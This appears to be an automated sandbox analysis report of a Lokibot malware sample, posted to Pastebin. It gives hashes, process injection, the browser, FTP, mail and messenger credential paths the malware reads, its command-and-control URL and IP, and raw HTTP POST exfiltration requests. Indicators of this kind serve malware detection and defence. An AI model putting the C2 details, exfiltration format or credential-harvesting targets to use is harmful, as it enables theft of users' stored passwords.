Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Lokibot"
- * MalScore: 10.0
- * File Name: "Loki_750533f9df37101a46af04831eba538a.exe"
- * File Size: 948736
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "25865fb21ae74d3d16822cb520655f55344a2400527944f64059bc79b7d8ad93"
- * MD5: "750533f9df37101a46af04831eba538a"
- * SHA1: "71c9df9caa8873f28ab4ccafeec5f3e030d9625d"
- * SHA512: "bf71bd41ac13cd49004da79f2df38aa095e2a8d72b55227b06e156f2c3f1a7389f7862a130d65e2223231b4eeb0186e583f1369ff98bf382f847168512d6cb06"
- * CRC32: "BB1E99EF"
- * SSDEEP: "24576:Mtb20pkaCqT5TBWgNQ7atqEuAuRrG86A:1Vg5tQ7atqEy5"
- * Process Execution:
- "Loki_750533f9df37101a46af04831eba538a.exe",
- "svchost.exe",
- "services.exe"
- * Executed Commands:
- "C:\\Windows\\system32\\lsass.exe"
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "svchost.exe tried to sleep 1440 seconds, actually delayed analysis time by 0 seconds"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "suspicious_request": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "Loki_750533f9df37101a46af04831eba538a.exe(2040) -> svchost.exe(1640)"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 16363591 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
- "Description": "File has been identified by 25 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "AIT:Trojan.Nymeria.265"
- "CAT-QuickHeal": "TrojanPWS.AutoIT.Dclog.S"
- "McAfee": "AUTOIT/Injector.p"
- "Cybereason": "malicious.9df371"
- "Arcabit": "AIT:Trojan.Nymeria.265"
- "APEX": "Malicious"
- "Kaspersky": "Packed.Win32.Krap.im"
- "BitDefender": "AIT:Trojan.Nymeria.265"
- "Ad-Aware": "AIT:Trojan.Nymeria.265"
- "Emsisoft": "AIT:Trojan.Nymeria.265 (B)"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.Dropper.dh"
- "Trapmine": "malicious.moderate.ml.score"
- "FireEye": "Generic.mg.750533f9df37101a"
- "Avira": "HEUR/AGEN.1000260"
- "Microsoft": "PWS:Win32/Fareit.BD!bit"
- "Endgame": "malicious (high confidence)"
- "ZoneAlarm": "Packed.Win32.Krap.im"
- "AhnLab-V3": "Packed/Win32.RL_Krap.R264305"
- "ALYac": "AIT:Trojan.Nymeria.265"
- "MAX": "malware (ai score=88)"
- "ESET-NOD32": "a variant of Win32/Injector.DMUI"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "GData": "AIT:Trojan.Nymeria.265 (2x)"
- "CrowdStrike": "win/malicious_confidence_100% (W)"
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
- "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
- "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
- "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
- "signature": "ET TROJAN LokiBot Fake 404 Response"
- "signature": "ET TROJAN LokiBot Checkin"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
- * Started Service:
- "VaultSvc"
- * Mutexes:
- "6EFA73A4746045B65DEE781E"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1937.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1.resource",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\aut1937.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Windows\\SysWOW64\\svchost.exe"
- * Modified Registry Keys:
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "grainertypople.sytes.net",
- "answers":
- "data": "154.120.72.182",
- "type": "A"
- * Domains:
- "ip": "154.120.72.182",
- "domain": "grainertypople.sytes.net"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "grainertypople.sytes.net",
- "version": "1.0",
- "path": "/DHBFMM/Panel/five/fre.php",
- "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 24,
- "body": "",
- "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "grainertypople.sytes.net",
- "version": "1.0",
- "path": "/DHBFMM/Panel/five/fre.php",
- "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
- "uri": "http://grainertypople.sytes.net/DHBFMM/Panel/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "grainertypople.sytes.net",
- "version": "1.0",
- "path": "/DHBFMM/Panel/five/fre.php",
- "data": "POST /DHBFMM/Panel/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: grainertypople.sytes.net\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 794AB976\r\nContent-Length: 149\r\nConnection: close\r\n\r\n\\x12\\x00(\\x00\\x00\\x00\\x07\\x00\\x00\\x00ckav.ru\\x01\\x00\\x06\\x00\\x00\\x00s\\x00b\\x00u\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x01\\x00\\x10\\x00\\x00\\x00S\\x00B\\x00U\\x00W\\x007\\x00X\\x006\\x004\\x00\\x80\\x07\\x00\\x00\\xc2\\x03\\x00\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x06\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x000\\x00\\x00\\x006\\x00E\\x00F\\x00A\\x007\\x003\\x00A\\x004\\x007\\x004\\x006\\x000\\x004\\x005\\x00B\\x006\\x005\\x00D\\x00E\\x00E\\x007\\x008\\x001\\x00E\\x00",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement